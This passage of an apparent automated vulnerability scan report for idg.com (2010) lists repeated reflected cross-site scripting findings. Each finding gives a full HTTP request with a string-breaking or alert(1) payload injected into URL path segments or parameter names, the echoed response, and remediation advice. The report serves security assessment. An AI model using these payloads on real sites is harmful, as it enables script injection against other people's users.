<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ba3";c63f355635b/FAQ"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca5b"%3b8da2a1ee7b7 was submitted in the REST URL parameter 4. This input was echoed as fca5b";8da2a1ee7b7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/FAQfca5b"%3b8da2a1ee7b7 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQfca5b";8da2a1ee7b7"); } catch(err) {}</script> ...[SNIP]...
2.109. http://idg.com/www/HomeNew.nsf/docs/FAQ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/FAQ
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fafea"-alert(1)-"067a0a1a13e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5025 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/FAQ?fafea"-alert(1)-"067a0a1a13e=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24d1e"%3bdadbac10c59 was submitted in the REST URL parameter 1. This input was echoed as 24d1e";dadbac10c59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www24d1e"%3bdadbac10c59/HomeNew.nsf/docs/IDG_News HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:51 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www24d1e";dadbac10c59/HomeNew.nsf/docs/IDG_News"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f39"%3b63b032dcd9f was submitted in the REST URL parameter 3. This input was echoed as c5f39";63b032dcd9f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docsc5f39"%3b63b032dcd9f/IDG_News HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:52 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsc5f39";63b032dcd9f/IDG_News"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d821a"%3becac31d59cc was submitted in the REST URL parameter 4. This input was echoed as d821a";ecac31d59cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/IDG_Newsd821a"%3becac31d59cc HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:52 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_Newsd821a";ecac31d59cc"); } catch(err) {}</script> ...[SNIP]...
2.113. http://idg.com/www/HomeNew.nsf/docs/IDG_News [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/IDG_News
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aee3"-alert(1)-"3f5767d6355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:51 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5030 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d38df"%3b63795650db was submitted in the REST URL parameter 1. This input was echoed as d38df";63795650db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd38df"%3b63795650db/HomeNew.nsf/docs/News_Service_Intro HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:49 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd38df";63795650db/HomeNew.nsf/docs/News_Service_Intro"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f31a"%3bf49933a2289 was submitted in the REST URL parameter 3. This input was echoed as 6f31a";f49933a2289 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs6f31a"%3bf49933a2289/News_Service_Intro HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:49 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6f31a";f49933a2289/News_Service_Intro"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec197"%3bcf066359d11 was submitted in the REST URL parameter 4. This input was echoed as ec197";cf066359d11 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/News_Service_Introec197"%3bcf066359d11 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:50 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Introec197";cf066359d11"); } catch(err) {}</script> ...[SNIP]...
2.117. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/News_Service_Intro
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f97"-alert(1)-"2417de8ae21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9d27"%3bed6f933dbda was submitted in the REST URL parameter 1. This input was echoed as c9d27";ed6f933dbda in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwc9d27"%3bed6f933dbda/HomeNew.nsf/docs/Tech_Update HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5020 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwc9d27";ed6f933dbda/HomeNew.nsf/docs/Tech_Update"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ca0"%3b337c5265295 was submitted in the REST URL parameter 3. This input was echoed as e2ca0";337c5265295 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docse2ca0"%3b337c5265295/Tech_Update HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5020 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docse2ca0";337c5265295/Tech_Update"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5393d"%3b6d1b7fafa03 was submitted in the REST URL parameter 4. This input was echoed as 5393d";6d1b7fafa03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/Tech_Update5393d"%3b6d1b7fafa03 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5020 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update5393d";6d1b7fafa03"); } catch(err) {}</script> ...[SNIP]...
2.121. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/Tech_Update
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f0fb"-alert(1)-"5adeeb9e27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5032 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b76d"%3b5c59a29b3cd was submitted in the REST URL parameter 1. This input was echoed as 3b76d";5c59a29b3cd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www3b76d"%3b5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www3b76d";5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56031"%3b9d8b60f1346 was submitted in the REST URL parameter 3. This input was echoed as 56031";9d8b60f1346 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs56031"%3b9d8b60f1346/U.S._Sales HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs56031";9d8b60f1346/U.S._Sales"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e4f8"%3b82b293410c0 was submitted in the REST URL parameter 4. This input was echoed as 5e4f8";82b293410c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/U.S._Sales5e4f8"%3b82b293410c0 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
